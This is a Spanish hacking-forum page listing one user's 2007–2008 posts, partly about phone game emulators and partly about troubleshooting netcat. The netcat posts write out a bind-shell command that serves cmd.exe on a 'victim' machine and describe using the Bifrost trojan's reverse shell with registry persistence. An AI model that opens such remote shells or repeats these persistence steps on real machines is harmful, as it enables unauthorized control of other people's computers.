elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 [4]
31  Seguridad Informática / Hacking / Re: Jugando con netcat en: 10 Mayo 2008, 01:42 am
http://www.usuarios.lycos.es/orlyyan/index.html

aqui encontraran todo sobre netcat
32  Media / Juegos y Consolas / emulador para nokia 6131 en: 23 Febrero 2008, 22:56 pm


Saludos he buscado atraves de toda la red y no encuentro ningun emulador para SNES para nokia 6131, si alguien sabe de una jar con el cual pueda reproducir juegos smc para super nintendo por favor paseme el link, para probar.
33  Seguridad Informática / Hacking / todo sobre netcat en: 23 Febrero 2008, 02:00 am
http://usuarios.lycos.es/orlyyan/index.html

todo sobre netcat
34  Media / Juegos y Consolas / Re: Exclusivo Emulador de NES PARA MOVILES en: 23 Febrero 2008, 01:52 am
Que bien

hombre como puedo transformar un juego smc a nes a mi me gustaba mucho ese llamado top gear o el super star soccer y el inolvidable metal warrior (era de un roboT)


atte

James Jansen
35  Seguridad Informática / Hacking / Re: Jugando con netcat en: 25 Noviembre 2007, 20:49 pm
D4RIO
gracias por contestar sobre mi problema con el netcat sobre el ping si lo hago es
 lo primero, para ver si hay repusta, al raro que sucede es que esa misma maquina esta infectada con el bifrost, y si me da conexión, incluso si hago una shell inversa con el modulo de el bifrost me conecta pero solo por un instante y luego se cae la conexión incluso se lo añadi al registro para que arranque automaticamente funciona pero igual se cae la conexion al parecer el ruteador esta configurado de tal manera de que solo ciertas conexiones se haga de punto a punto porque ya lo intente con otra maquina de la red el cual es Xp, hice lo mismo claro cambiando los parametros para que me deje pasar el firewall de xp y funcione con el cmd de xp, y me tira la conexion.

de todas maneras gracias
36  Seguridad Informática / Hacking / Re: Jugando con netcat en: 11 Noviembre 2007, 23:57 pm
D4RIO quiese decir en la maquina victima esta nc -L -d -e cmd.exe -p 21

y yo me conecto con la ip ejemplo nc 10.10.42.43 21 pero demora un chorro en conectarse para luego cerrarse por hay mismo.

indico las maquinas son wind 98 se
37  Seguridad Informática / Hacking / Re: Jugando con netcat en: 10 Noviembre 2007, 22:46 pm
alguien sabe porque al conectarme por shell directa con nc -L -d -e cmd.exe -p 21
me conecta me sale puerto abierto pero demora una eternidad aparte que a veces se cuelga y salen simbolos extraños durante la conexión cabe mencionar que las dos maquinas con wind 98 SE y no tienen internet es un red interna en el trabajo.
Páginas: 1 2 3 [4]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines